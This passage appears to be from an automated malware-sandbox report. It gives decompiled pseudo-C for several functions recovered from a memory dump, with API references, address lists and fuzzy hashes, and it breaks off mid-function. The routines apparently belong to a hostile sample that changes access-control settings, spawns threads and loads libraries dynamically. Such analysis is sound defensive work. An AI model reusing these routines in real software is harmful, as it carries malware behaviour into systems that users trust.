memoryCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E0008BD10() {
				char _v8;
				void* _v12;
				char _v16;
				short _v20;
				char _v24;
				short _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v88;
				intOrPtr _v92;
				void _v96;
				intOrPtr _t58;
				intOrPtr _t61;
				intOrPtr _t63;
				intOrPtr _t65;
				intOrPtr _t67;
				intOrPtr _t70;
				intOrPtr _t73;
				intOrPtr _t77;
				intOrPtr _t79;
				intOrPtr _t81;
				intOrPtr _t85;
				intOrPtr _t87;
				signed int _t90;
				void* _t92;
				intOrPtr _t93;
				void* _t98;

				_t90 = 8;
				_v28 = 0xf00;
				_v32 = 0;
				_v24 = 0;
				memset( &_v96, 0, _t90 << 2);
				_v20 = 0x100;
				_push( &_v12);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_v16 = 0;
				_push(0);
				_v8 = 0;
				_push(1);
				_v12 = 0;
				_push( &_v24);
				_t58 =  *0x9e68c; // 0x12afab8
				_t98 = 0;
				if( *((intOrPtr*)(_t58 + 0xc))() == 0) {
					L14:
					if(_v8 != 0) {
						_t67 =  *0x9e68c; // 0x12afab8
						 *((intOrPtr*)(_t67 + 0x10))(_v8);
					}
					if(_v12 != 0) {
						_t65 =  *0x9e68c; // 0x12afab8
						 *((intOrPtr*)(_t65 + 0x10))(_v12);
					}
					if(_t98 != 0) {
						_t63 =  *0x9e684; // 0x12af8f0
						 *((intOrPtr*)(_t63 + 0x34))(_t98);
					}
					if(_v16 != 0) {
						_t61 =  *0x9e684; // 0x12af8f0
						 *((intOrPtr*)(_t61 + 0x34))(_v16);
					}
					L22:
					return _t98;
				}
				_v68 = _v12;
				_t70 =  *0x9e688; // 0xf0000
				_t92 = 2;
				_v96 = 0x1fffff;
				_v92 = 0;
				_v88 = 3;
				_v76 = 0;
				_v72 = 5;
				if( *((intOrPtr*)(_t70 + 4)) != 6 ||  *((intOrPtr*)(_t70 + 8)) < 0) {
					if( *((intOrPtr*)(_t70 + 4)) < 0xa) {
						goto L7;
					}
					goto L4;
				} else {
					L4:
					_push( &_v8);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(1);
					_push(_t92);
					_push(_t92);
					_push( &_v32);
					_t85 =  *0x9e68c; // 0x12afab8
					if( *((intOrPtr*)(_t85 + 0xc))() == 0) {
						goto L14;
					} else {
						_t87 = _v8;
						if(_t87 != 0) {
							_push(2);
							_pop(1);
							_v64 = 0x1fffff;
							_v60 = 1;
							_v56 = 3;
							_v44 = 0;
							_v40 = 1;
							_v36 = _t87;
						}
						L7:
						_push( &_v16);
						_push(0);
						_push( &_v96);
						_t73 =  *0x9e68c; // 0x12afab8
						_push(1); // executed
						if( *((intOrPtr*)(_t73 + 8))() != 0) {
							goto L14;
						}
						_t98 = LocalAlloc(0x40, 0x14);
						if(_t98 == 0) {
							goto L14;
						}
						_t93 =  *0x9e68c; // 0x12afab8
						_push(1);
						_push(_t98);
						if( *((intOrPtr*)(_t93 + 0x90))() == 0) {
							goto L14;
						}
						_t77 =  *0x9e68c; // 0x12afab8
						_push(0);
						_push(_v16);
						_push(1);
						_push(_t98);
						if( *((intOrPtr*)(_t77 + 0x94))() == 0) {
							goto L14;
						}
						if(_v8 != 0) {
							_t81 =  *0x9e68c; // 0x12afab8
							 *((intOrPtr*)(_t81 + 0x10))(_v8);
						}
						_t79 =  *0x9e68c; // 0x12afab8
						 *((intOrPtr*)(_t79 + 0x10))(_v12);
						goto L22;
					}
				}
			}

0x0008bd1b
0x0008bd1e
0x0008bd26
0x0008bd2c
0x0008bd2f
0x0008bd34
0x0008bd3a
0x0008bd3b
0x0008bd3c
0x0008bd3d
0x0008bd3e
0x0008bd3f
0x0008bd40
0x0008bd41
0x0008bd44
0x0008bd47
0x0008bd49
0x0008bd4c
0x0008bd50
0x0008bd53
0x0008bd54
0x0008bd59
0x0008bd60
0x0008be54
0x0008be58
0x0008be5a
0x0008be62
0x0008be62
0x0008be69
0x0008be6b
0x0008be73
0x0008be73
0x0008be78
0x0008be7a
0x0008be80
0x0008be80
0x0008be87
0x0008be89
0x0008be91
0x0008be91
0x0008be95
0x0008be9a
0x0008be9a
0x0008bd6b
0x0008bd6e
0x0008bd75
0x0008bd76
0x0008bd7d
0x0008bd80
0x0008bd87
0x0008bd8a
0x0008bd95
0x0008bda0
0x00000000
0x00000000
0x00000000
0x0008bda2
0x0008bda2
0x0008bda5
0x0008bda6
0x0008bda7
0x0008bda8
0x0008bda9
0x0008bdaa
0x0008bdab
0x0008bdac
0x0008bdae
0x0008bdaf
0x0008bdb3
0x0008bdb4
0x0008bdbe
0x00000000
0x0008bdc4
0x0008bdc4
0x0008bdc9
0x0008bdcb
0x0008bdcd
0x0008bdce
0x0008bdd5
0x0008bdd8
0x0008bddf
0x0008bde2
0x0008bde5
0x0008bde5
0x0008bde8
0x0008bdeb
0x0008bdec
0x0008bdf0
0x0008bdf1
0x0008bdf6
0x0008bdfc
0x00000000
0x00000000
0x0008be08
0x0008be0c
0x00000000
0x00000000
0x0008be0e
0x0008be14
0x0008be16
0x0008be1f
0x00000000
0x00000000
0x0008be21
0x0008be26
0x0008be27
0x0008be2a
0x0008be2c
0x0008be35
0x00000000
0x00000000
0x0008be3a
0x0008be3c
0x0008be44
0x0008be44
0x0008be47
0x0008be4f
0x00000000
0x0008be4f
0x0008bdbe

APIs

SetEntriesInAclA.ADVAPI32(00000001,001FFFFF,00000000,?), ref: 0008BDF7
LocalAlloc.KERNEL32(00000040,00000014), ref: 0008BE02

Memory Dump Source

Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: AllocEntriesLocal
String ID:
API String ID: 2146116654-0
Opcode ID: abd2abb1c2a675e30db1c05a41365c71064cf18d764b66cf42dc4a5385c88731
Instruction ID: 3aa66279fdb8b3e8acfe9a35cde7f6eb8d9a09b5f03ef1515584b77c0f26ffcf
Opcode Fuzzy Hash: abd2abb1c2a675e30db1c05a41365c71064cf18d764b66cf42dc4a5385c88731
Instruction Fuzzy Hash: C3512A71A00248EFEB64DF99D888ADEBBF8FF44704F15806AF604AB260D7749D45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 000898EE, Relevance: 3.1, APIs: 2, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E000898EE(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t45;
				intOrPtr _t46;
				intOrPtr _t48;
				intOrPtr _t49;
				void* _t52;
				intOrPtr _t53;
				intOrPtr _t54;
				struct _SECURITY_ATTRIBUTES* _t58;
				intOrPtr _t59;
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t69;
				struct _SECURITY_ATTRIBUTES* _t73;
				intOrPtr _t74;
				intOrPtr _t77;
				intOrPtr _t78;
				intOrPtr _t79;
				intOrPtr _t82;
				intOrPtr _t83;
				void* _t86;
				intOrPtr _t87;
				intOrPtr _t89;
				signed int _t92;
				intOrPtr _t97;
				intOrPtr _t98;
				int _t106;
				intOrPtr _t110;
				signed int _t112;
				signed int _t113;
				void* _t115;

				_push(__ecx);
				_push(__ecx);
				_v8 = __edx;
				_v12 = __ecx;
				_t77 =  *0x9e76c; // 0x1dc
				_t73 = 0;
				if(E0008A4BF(_t77, 0x7530) >= 0) {
					_t45 =  *0x9e770; // 0x1400b50
					_t112 = 0;
					_t106 = 0;
					do {
						_t78 =  *((intOrPtr*)(_t106 + _t45));
						if(_t78 == 0) {
							L6:
							if( *((intOrPtr*)(_t106 + _t45)) == _t73) {
								_t113 = _t112 << 5;
								if(_v8 == _t73) {
									 *(_t113 + _t45 + 0x10) = _t73;
									_t46 =  *0x9e770; // 0x1400b50
									 *(_t113 + _t46 + 0xc) = _t73;
									L14:
									_t79 =  *0x9e770; // 0x1400b50
									 *((intOrPtr*)(_t113 + _t79 + 0x14)) = _a8;
									_t48 =  *0x9e770; // 0x1400b50
									 *((intOrPtr*)(_t113 + _t48 + 8)) = _v12;
									_t49 = E0008A471(0, 1);
									_t82 =  *0x9e770; // 0x1400b50
									 *((intOrPtr*)(_t113 + _t82 + 0x1c)) = _t49;
									_t83 =  *0x9e770; // 0x1400b50
									_t30 = _t83 + _t113 + 4; // 0x1400b54
									_t52 = CreateThread(_t73, _t73, E000898A6, _t83 + _t113, _t73, _t30);
									_t53 =  *0x9e770; // 0x1400b50
									 *(_t113 + _t53) = _t52;
									_t54 =  *0x9e770; // 0x1400b50
									_t86 =  *(_t113 + _t54);
									if(_t86 != 0) {
										SetThreadPriority(_t86, 0xffffffff);
										_t87 =  *0x9e770; // 0x1400b50
										 *0x9e774 =  *0x9e774 + 1;
										E0008A4DB( *((intOrPtr*)(_t113 + _t87 + 0x1c)));
										_t74 =  *0x9e770; // 0x1400b50
										_t73 = _t74 + _t113;
									} else {
										_t59 =  *0x9e684; // 0x12af8f0
										 *((intOrPtr*)(_t59 + 0x30))( *((intOrPtr*)(_t113 + _t54 + 0x1c)));
										_t61 =  *0x9e770; // 0x1400b50
										_t37 = _t61 + 0xc; // 0x1400b5c
										_t91 = _t37 + _t113;
										if( *((intOrPtr*)(_t37 + _t113)) != _t73) {
											E0008861A(_t91,  *((intOrPtr*)(_t113 + _t61 + 0x10)));
											_t61 =  *0x9e770; // 0x1400b50
										}
										_t92 = 8;
										memset(_t113 + _t61, 0, _t92 << 2);
									}
									L19:
									_t89 =  *0x9e76c; // 0x1dc
									E0008A4DB(_t89);
									_t58 = _t73;
									L20:
									return _t58;
								}
								_t110 = _a4;
								_t65 = E00088604(_t110);
								_t97 =  *0x9e770; // 0x1400b50
								 *((intOrPtr*)(_t113 + _t97 + 0xc)) = _t65;
								_t66 =  *0x9e770; // 0x1400b50
								if( *((intOrPtr*)(_t113 + _t66 + 0xc)) == _t73) {
									goto L19;
								}
								 *((intOrPtr*)(_t113 + _t66 + 0x10)) = _t110;
								_t67 =  *0x9e770; // 0x1400b50
								E000886E1( *((intOrPtr*)(_t113 + _t67 + 0xc)), _v8, _t110);
								_t115 = _t115 + 0xc;
								goto L14;
							}
							goto L7;
						}
						_t69 =  *0x9e684; // 0x12af8f0
						_push(_t73);
						_push(_t78);
						if( *((intOrPtr*)(_t69 + 0x2c))() == 0x102) {
							_t45 =  *0x9e770; // 0x1400b50
							goto L7;
						}
						_t98 =  *0x9e770; // 0x1400b50
						E0008984A(_t106 + _t98, 0);
						_t45 =  *0x9e770; // 0x1400b50
						goto L6;
						L7:
						_t106 = _t106 + 0x20;
						_t112 = _t112 + 1;
					} while (_t106 < 0x1000);
					goto L19;
				}
				_t58 = 0;
				goto L20;
			}

0x000898f1
0x000898f2
0x000898f3
0x000898fb
0x000898fe
0x00089905
0x0008990e
0x00089917
0x0008991e
0x00089920
0x00089922
0x00089922
0x00089927
0x0008994f
0x00089952
0x0008996c
0x00089972
0x000899b2
0x000899b6
0x000899bb
0x000899bf
0x000899bf
0x000899cb
0x000899cf
0x000899d7
0x000899dd
0x000899e2
0x000899e8
0x000899ec
0x000899f4
0x00089a06
0x00089a0b
0x00089a10
0x00089a13
0x00089a18
0x00089a1d
0x00089a59
0x00089a5f
0x00089a65
0x00089a6f
0x00089a74
0x00089a7a
0x00089a1f
0x00089a23
0x00089a28
0x00089a2b
0x00089a30
0x00089a33
0x00089a37
0x00089a3e
0x00089a43
0x00089a49
0x00089a51
0x00089a52
0x00089a52
0x00089a7c
0x00089a7c
0x00089a82
0x00089a88
0x00089a8b
0x00089a8d
0x00089a8d
0x00089974
0x00089978
0x0008997e
0x00089984
0x00089988
0x00089991
0x00000000
0x00000000
0x00089997
0x0008999b
0x000899a8
0x000899ad
0x00000000
0x000899ad
0x00000000
0x00089952
0x00089929
0x0008992e
0x0008992f
0x00089938
0x00089965
0x00000000
0x00089965
0x0008993a
0x00089945
0x0008994a
0x00000000
0x00089954
0x00089954
0x00089957
0x00089958
0x00000000
0x00089960
0x00089910
0x00000000

Memory Dump Source

Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13136b35abf7dcd7586c6f32f264bee96a55df3916c08bc9964099082c366c6c
Instruction ID: 2208b45a903d8e4e3ebf4af7583ef236fbc94e4c18dfd99628fde9c82a46c99b
Opcode Fuzzy Hash: 13136b35abf7dcd7586c6f32f264bee96a55df3916c08bc9964099082c366c6c
Instruction Fuzzy Hash: 4F515171614640DFEB69EFA8DC84876F7F9FB48314358892EE48687361D735AC02CB42

Uniqueness

Uniqueness Score: -1.00%

Function 00085631, Relevance: 3.1, APIs: 2, Instructions: 97
sleepsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00085631(void* __edx, void* __edi) {
				char _v44;
				void* _t8;
				intOrPtr _t11;
				intOrPtr _t14;
				intOrPtr _t17;
				intOrPtr _t18;
				void* _t20;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t39;
				void* _t40;
				intOrPtr _t49;
				void* _t54;

				_t54 = __edi;
				_t8 = E00089E66(0x3b); // executed
				if(_t8 != 0xffffffff) {
					L2:
					E0008980C(0x9e6c8);
					_t39 = 0x37; // executed
					E00089F06(_t39);
					_t11 =  *0x9e688; // 0xf0000
					_t40 = 0x3a; // executed
					E00089F06(_t40); // executed
					E0008E4C1(_t63);
					_t14 =  *0x9e688; // 0xf0000
					_t41 =  &_v44;
					_t52 =  *((intOrPtr*)(_t14 + 0xac)) + 2;
					E0008A86D( &_v44,  *((intOrPtr*)(_t14 + 0xac)) + 2, _t63);
					_t17 =  *0x9e684; // 0x12af8f0
					_t18 =  *((intOrPtr*)(_t17 + 0xc4))(0, 0, 0,  &_v44,  *((intOrPtr*)(_t11 + 0x1640)), 0,  *0x9e6c8,  *0x9e6cc);
					 *0x9e74c = _t18;
					if(_t18 != 0) {
						_t20 = CreateMutexA(0, 0, 0);
						 *0x9e76c = _t20;
						__eflags = _t20;
						if(_t20 != 0) {
							_t34 = E00088604(0x1000);
							_t52 = 0;
							 *0x9e770 = _t34;
							_t49 =  *0x9e774; // 0x2
							__eflags = _t34;
							_t41 =  !=  ? 0 : _t49;
							 *0x9e774 =  !=  ? 0 : _t49; // executed
						}
						E0008153B(_t41, _t52); // executed
						E000898EE(E00082EDA, 0, __eflags, 0, 0); // executed
						E00083017(); // executed
						E000831C2(0, __eflags); // executed
						E000829B1(); // executed
						E00083BB2(_t54, __eflags); // executed
						while(1) {
							__eflags =  *0x9e758; // 0x0
							if(__eflags != 0) {
								break;
							}
							E0008980C(0x9e750);
							_push(0x9e750);
							_push(0x9e750); // executed
							E0008279B();
							Sleep(0xfa0);
						}
						E00083D34();
						E00089A8E();
						E000834CB();
						_t33 = 0;
						__eflags = 0;
					} else {
						goto L3;
					}
				} else {
					_t36 = E00082DCB();
					_t63 = _t36;
					if(_t36 != 0) {
						L3:
						_t33 = 1;
					} else {
						goto L2;
					}
				}
				return _t33;
			}

0x00085631
0x0008563d
0x00085646
0x00085651
0x00085656
0x00085669
0x0008566a
0x0008566f
0x0008567f
0x00085680
0x00085688
0x0008568d
0x00085692
0x0008569c
0x0008569f
0x000856a9
0x000856b1
0x000856b7
0x000856be
0x000856d0
0x000856d6
0x000856db
0x000856dd
0x000856e4
0x000856e9
0x000856eb
0x000856f1
0x000856f7
0x000856f9
0x000856fc
0x000856fc
0x00085702
0x00085710
0x00085717
0x0008571c
0x00085721
0x00085726
0x00085750
0x00085750
0x00085756
0x00000000
0x00000000
0x00085732
0x00085737
0x00085738
0x00085739
0x0008574a
0x0008574a
0x00085758
0x0008575d
0x00085762
0x00085767
0x00085767
0x00000000
0x00000000
0x00000000
0x00085648
0x00085648
0x0008564d
0x0008564f
0x000856c0
0x000856c2
0x00000000
0x00000000
0x00000000
0x0008564f
0x0008576d

APIs

CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 000856D0

Part of subcall function 0008980C: GetSystemTimeAsFileTime.KERNEL32(?,?,00085FAF), ref: 00089819
Part of subcall function 0008980C: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00089839

Sleep.KERNELBASE(00000FA0), ref: 0008574A

Memory Dump Source

Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: Time$CreateFileMutexSleepSystemUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 3249252070-0
Opcode ID: 3562f7877b88b9be417dacf07b104c639c27ee61355e5b92e6b06fab33a1451d
Instruction ID: 618d9e32d6944c2961c1c58ef027407fe41e2fb87ac27e57644674ab890b217f
Opcode Fuzzy Hash: 3562f7877b88b9be417dacf07b104c639c27ee61355e5b92e6b06fab33a1451d
Instruction Fuzzy Hash: 0031D6312056509BF724FBB5EC069EA3B99FF557A0B144126F5C9861A3EE349900C763

Uniqueness

Uniqueness Score: -1.00%

Function 0008A6A9, Relevance: 3.1, APIs: 2, Instructions: 90
fileCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E0008A6A9(void* __ecx, signed int _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t29;
				intOrPtr _t34;
				intOrPtr* _t39;
				void* _t47;
				intOrPtr _t55;
				intOrPtr _t58;
				char _t60;

				_push(__ecx);
				_push(__ecx);
				_t50 = _a4;
				_t60 = 0;
				_v12 = 0;
				if(_a4 != 0) {
					_t47 = E0008A63B(_t50);
					if(_t47 == 0) {
						L11:
						_t26 = 0;
						L12:
						L13:
						return _t26;
					}
					_t27 =  *0x9e684; // 0x12af8f0
					_t58 =  *((intOrPtr*)(_t27 + 0xe8))(_t47, 0);
					if(_t58 == 0) {
						L9:
						_t29 =  *0x9e684; // 0x12af8f0
						 *((intOrPtr*)(_t29 + 0x30))(_t47);
						if(_t60 != 0) {
							E0008861A( &_v12, 0);
						}
						goto L11;
					}
					_t4 = _t58 + 1; // 0x1
					_t34 = E00088604(_t4); // executed
					_t60 = _t34;
					_v12 = _t60;
					if(_t60 == 0) {
						goto L9;
					}
					_a4 = _a4 & 0;
					_push(0);
					_v8 = 0;
					_push( &_a4);
					_push(_t58);
					_push(_t60);
					while(ReadFile(_t47, ??, ??, ??, ??) != 0) {
						if(_a4 == 0) {
							if(_v8 != _t58) {
								goto L9;
							}
							_t39 = _a8;
							 *((char*)(_t58 + _t60)) = 0;
							if(_t39 != 0) {
								 *_t39 = _t58;
							}
							CloseHandle(_t47);
							_t26 = _t60;
							goto L12;
						}
						_t55 = _v8 + _a4;
						_a4 = _a4 & 0x00000000;
						_push(0);
						_push( &_a4);
						_v8 = _t55;
						_push(_t58 - _t55);
						_push(_t55 + _t60);
					}
					goto L9;
				}
				_t26 = 0;
				goto L13;
			}

0x0008a6ac
0x0008a6ad
0x0008a6ae
0x0008a6b2
0x0008a6b4
0x0008a6b9
0x0008a6c9
0x0008a6cd
0x0008a757
0x0008a757
0x0008a759
0x0008a75b
0x0008a75d
0x0008a75d
0x0008a6d3
0x0008a6e1
0x0008a6e5
0x0008a73d
0x0008a73d
0x0008a743
0x0008a748
0x0008a750
0x0008a756
0x00000000
0x0008a748
0x0008a6e7
0x0008a6eb
0x0008a6f0
0x0008a6f2
0x0008a6f8
0x00000000
0x00000000
0x0008a6fc
0x0008a6ff
0x0008a700
0x0008a706
0x0008a707
0x0008a708
0x0008a72d
0x0008a70f
0x0008a761
0x00000000
0x00000000
0x0008a763
0x0008a766
0x0008a76c
0x0008a76e
0x0008a76e
0x0008a776
0x0008a779
0x00000000
0x0008a779
0x0008a717
0x0008a71a
0x0008a71e
0x0008a720
0x0008a723
0x0008a728
0x0008a72c
0x0008a72c
0x00000000
0x0008a72d
0x0008a6bb
0x00000000

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,0008FA56,00000000,0008F8B5,000EEFE0,0009B990,00000000,0009B990,00000000,00000000,00000615), ref: 0008A733
CloseHandle.KERNELBASE(00000000,?,0008FA56,00000000,0008F8B5,000EEFE0,0009B990,00000000,0009B990,00000000,00000000,00000615,0000034A,00000000,012AFD20,00000400), ref: 0008A776

Memory Dump Source

Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: CloseFileHandleRead
String ID:
API String ID: 2331702139-0
Opcode ID: 88356f6b106add4076ec0f83c2a296f690f09df244fe65e188c16454d9d3e760
Instruction ID: 682a662acdfee72883915282426476a47a31b64306a9f0d0b2be5f1f474e3a22
Opcode Fuzzy Hash: 88356f6b106add4076ec0f83c2a296f690f09df244fe65e188c16454d9d3e760
Instruction Fuzzy Hash: DE218D76B04205AFEB50EF64CC84FAA77FCBB05744F10806AF946DB642E770D9409B91

Uniqueness

Uniqueness Score: -1.00%

Function 0008153B, Relevance: 3.1, APIs: 2, Instructions: 69
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E0008153B(void* __ecx, void* __edx) {
				void* _v8;
				void* _t3;
				signed int _t4;
				intOrPtr _t7;
				signed int _t9;
				intOrPtr _t10;
				void* _t24;

				_push(__ecx);
				_t3 = CreateMutexA(0, 0, 0);
				 *0x9e6f4 = _t3;
				if(_t3 == 0) {
					L11:
					_t4 = _t3 | 0xffffffff;
					__eflags = _t4;
				} else {
					_t3 = CreateMutexA(0, 0, 0);
					 *0x9e6dc = _t3;
					if(_t3 == 0) {
						goto L11;
					} else {
						_t3 = E00081080(0x4ac);
						_v8 = _t3;
						if(_t3 == 0) {
							goto L11;
						} else {
							 *0x9e6e8 = E000891A6(_t3, 0);
							E000885C2( &_v8);
							_t7 = E00088604(0x100);
							 *0x9e6f0 = _t7;
							if(_t7 != 0) {
								 *0x9e6fc = 0;
								_t9 = E00088604(0x401);
								 *0x9e6d4 = _t9;
								__eflags = _t9;
								if(_t9 != 0) {
									__eflags =  *0x9e6c0; // 0x0
									if(__eflags == 0) {
										E000915B6(0x88202, 0x8820b);
									}
									_push(0x61e);
									_t24 = 8;
									_t10 = E0008E1BC(0x9bd28, _t24); // executed
									 *0x9e6a0 = _t10;
									_t4 = 0;
								} else {
									_push(0xfffffffc);
									goto L5;
								}
							} else {
								_push(0xfffffffe);
								L5:
								_pop(_t4);
							}
						}
					}
				}
				return _t4;
			}

0x0008153e
0x00081545
0x0008154b
0x00081552
0x00081607
0x00081607
0x00081607
0x00081558
0x0008155b
0x00081561
0x00081568
0x00000000
0x0008156e
0x00081573
0x00081578
0x0008157d
0x00000000
0x00081583
0x0008158f
0x00081594
0x0008159e
0x000815a3
0x000815ab
0x000815b9
0x000815bf
0x000815c4
0x000815ca
0x000815cc
0x000815d2
0x000815d8
0x000815e4
0x000815ea
0x000815eb
0x000815f2
0x000815f8
0x000815fd
0x00081602
0x000815ce
0x000815ce
0x00000000
0x000815ce
0x000815ad
0x000815ad
0x000815af
0x000815af
0x000815af
0x000815ab
0x0008157d
0x00081568
0x0008160c

APIs

CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,00085707), ref: 00081545
CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,00085707), ref: 0008155B

Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612

Memory Dump Source

Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: CreateMutex$AllocateHeap
String ID:
API String ID: 704353917-0
Opcode ID: 77af8db251a9b19979746917907dab4167f055f59f2981c2fe2ca95fd249f9b3
Instruction ID: ebe42fdb1850e6894ca3f7a01c19cd8768a376f5bc184f032faea728c04dbff3
Opcode Fuzzy Hash: 77af8db251a9b19979746917907dab4167f055f59f2981c2fe2ca95fd249f9b3
Instruction Fuzzy Hash: A111C871604A82AAFB60FB76EC059AA36E8FFD17B0760462BE5D1D51D1FF74C8018710

Uniqueness

Uniqueness Score: -1.00%

Function 0008BC7A, Relevance: 3.1, APIs: 2, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E0008BC7A(void* __ecx, void* __edx) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _t18;
				intOrPtr _t19;
				intOrPtr _t27;
				intOrPtr _t30;
				intOrPtr _t36;
				intOrPtr _t38;
				char _t39;

				_t39 = 0;
				_t38 =  *0x9e674; // 0x1f8
				_v8 = 0;
				_v12 = 0;
				_v20 = 0;
				_v16 = 0;
				_t18 = E000895E1(__ecx, 0x84b);
				_push(0);
				_v24 = _t18;
				_push( &_v8);
				_push(1);
				_push(_t18);
				_t19 =  *0x9e68c; // 0x12afab8, executed
				if( *((intOrPtr*)(_t19 + 0x84))() != 0) {
					_push( &_v16);
					_push( &_v12);
					_push( &_v20);
					_t27 =  *0x9e68c; // 0x12afab8
					_push(_v8);
					if( *((intOrPtr*)(_t27 + 0x88))() != 0) {
						_push(_v12);
						_t30 =  *0x9e68c; // 0x12afab8
						_push(0);
						_push(0);
						_push(0);
						_push(0x10);
						_push(6);
						_push(_t38); // executed
						if( *((intOrPtr*)(_t30 + 0x8c))() == 0) {
							_t39 = 1;
						}
					}
					_t36 =  *0x9e68c; // 0x12afab8
					 *((intOrPtr*)(_t36 + 0x10))(_v8);
				}
				E000885D5( &_v24);
				return _t39;
			}

0x0008bc81
0x0008bc84
0x0008bc8f
0x0008bc92
0x0008bc95
0x0008bc98
0x0008bc9b
0x0008bca1
0x0008bca5
0x0008bca8
0x0008bca9
0x0008bcab
0x0008bcac
0x0008bcb9
0x0008bcbe
0x0008bcc2
0x0008bcc6
0x0008bcc7
0x0008bccc
0x0008bcd7
0x0008bcd9
0x0008bcdc
0x0008bce1
0x0008bce2
0x0008bce3
0x0008bce4
0x0008bce6
0x0008bce8
0x0008bcf1
0x0008bcf3
0x0008bcf3
0x0008bcf1
0x0008bcf4
0x0008bcfd
0x0008bcfd
0x0008bd04
0x0008bd0f

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000000,?,00083268,?,?,00000000,?,?,?,00085721), ref: 0008BCB1
SetSecurityInfo.ADVAPI32(000001F8,00000006,00000010,00000000,00000000,00000000,?,?,00083268,?,?,00000000,?,?,?,00085721), ref: 0008BCE9

Memory Dump Source

Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: Security$Descriptor$ConvertInfoString
String ID:
API String ID: 3187949549-0
Opcode ID: 49105266334ca50b45e4c17bdeae0f8f274821862b6dd8d3608f6b368af892b6
Instruction ID: 4b82ffe8c45477c1650446b5343723a2aeaa491c0a074740823efd8a3710dd5b
Opcode Fuzzy Hash: 49105266334ca50b45e4c17bdeae0f8f274821862b6dd8d3608f6b368af892b6
Instruction Fuzzy Hash: 54113A72A00219BBDB10EF95DC49EEEBBBCFF04740F1040A6B545E7151DBB09A01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0008E1BC, Relevance: 3.0, APIs: 2, Instructions: 35
libraryCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E0008E1BC(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v8;
				char _t5;
				struct HINSTANCE__* _t7;
				void* _t10;
				void* _t12;
				void* _t22;
				void* _t25;

				_push(__ecx);
				_t12 = __ecx;
				_t22 = __edx;
				_t5 = E000895C7(_a4);
				_t25 = 0;
				_v8 = _t5;
				_push(_t5);
				if(_a4 != 0x7c3) {
					_t7 = LoadLibraryA(); // executed
				} else {
					_t7 = GetModuleHandleA();
				}
				if(_t7 != 0) {
					_t10 = E0008E171(_t12, _t22, _t7); // executed
					_t25 = _t10;
				}
				E000885C2( &_v8);
				return _t25;
			}

0x0008e1bf
0x0008e1c2
0x0008e1c8
0x0008e1ca
0x0008e1cf
0x0008e1d1
0x0008e1db
0x0008e1dc
0x0008e1eb
0x0008e1de
0x0008e1de
0x0008e1de
0x0008e1ef
0x0008e1f6
0x0008e1fc
0x0008e1fc
0x0008e201
0x0008e20c

APIs

GetModuleHandleA.KERNEL32(00000000,00000000,00000001,?,0009BA28), ref: 0008E1DE
LoadLibraryA.KERNEL32(00000000,00000000,00000001,?,0009BA28), ref: 0008E1EB

Memory Dump Source

Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: HandleLibraryLoadModule
String ID:
API String ID: 4133054770-0
Opcode ID: 34ee8c9432c501ef63b31a96de4864626031fe048823fd25d1229eb6e9450f54
Instruction ID: eaac88a08efcd0d2a3f1dbc0b3101d04e6d50373736468e8fc033cf0e2f21452
Opcode Fuzzy Hash: 34ee8c9432c501ef63b31a96de4864626031fe048823fd25d1229eb6e9450f54
Instruction Fuzzy Hash: EBF0EC32700114ABDB44BB6DDC898AEB7EDBF54790714403AF406D3251DE70DE0087A0

Uniqueness

Uniqueness Score: -1.00%

Function 00082C8F, Relevance: 1.6, APIs: 1, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E00082C8F(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
				WCHAR* _v8;
				char _v12;
				char _v44;
				char _v564;
				char _v1084;
